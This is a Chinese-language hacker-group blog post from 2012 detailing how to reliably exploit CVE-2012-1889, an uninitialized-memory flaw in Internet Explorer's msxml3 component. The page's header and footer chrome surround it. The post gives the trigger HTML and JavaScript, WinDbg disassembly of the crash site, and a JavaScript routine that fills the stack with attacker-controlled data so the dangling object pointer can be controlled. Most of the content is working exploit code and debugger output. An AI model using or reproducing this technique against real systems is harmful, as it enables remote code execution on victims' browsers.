注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

Reliable Exploition of CVE-2012-1889  

2012-06-18 15:52:51|  分类: 0day漏洞 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
Reliable Exploition of CVE-2012-1889
2012-06-18 10:44

MSF的触发代码如下:

<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="xx"></object>

<script>

document.getElementById("xx").object.definition(0);

</script>

触发时的代码如下:

0:015> u 5dd8d7c9  L50

msxml3!_dispatchImpl::InvokeHelper+0x93:

5dd8d7c9 8b45ec          mov     eax,dword ptr [ebp-14h]

5dd8d7cc 3bc3            cmp     eax,ebx

5dd8d7ce 8bf0            mov     esi,eax

5dd8d7d0 7426            je      msxml3!_dispatchImpl::InvokeHelper+0xc2 (5dd8d7f8)

5dd8d7d2 ff7528          push    dword ptr [ebp+28h]

5dd8d7d5 8b08            mov     ecx,dword ptr [eax]

5dd8d7d7 ff7524          push    dword ptr [ebp+24h]

5dd8d7da ff7520          push    dword ptr [ebp+20h]

5dd8d7dd 57              push    edi

5dd8d7de 6a03            push    3

5dd8d7e0 ff7514          push    dword ptr [ebp+14h]

5dd8d7e3 6870a8d85d      push    offset msxml3!GUID_NULL (5dd8a870)

5dd8d7e8 53              push    ebx

5dd8d7e9 50              push    eax

5dd8d7ea ff5118          call    dword ptr [ecx+18h]

其 中 5dd8d7c9 8b45ec mov eax,dword ptr [ebp-14h] 中 eax的值来自于栈上,栈上的值未经初始化,被直接用做对象指针后就会出现问题。要稳定利用该漏洞,就需要对eax的值进行控制,只要预先在栈上排布我们 要的数据就可以,比如 unescape("%u1111%u1111")。以下代码可以实现该功能:

var src = unescape("%u1111%u1111");

while (src.length < 0x1002) src += src;

src="http://qqhack8.blog.163.com/blog/\\\\xxx" + src;

src = src.substr(0, 0x1000 - 10);

var pic = document.createElement("img");

pic.src = src;

pic.nameProp;

 

执行完 pic.nameProp 后,就会在栈上留下0x2000左右大小的可控数据。

 Reliable Exploition of CVE-2012-1889 - 拉登哥哥 - K8拉登哥哥s Blog

  评论这张
 
阅读(853)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016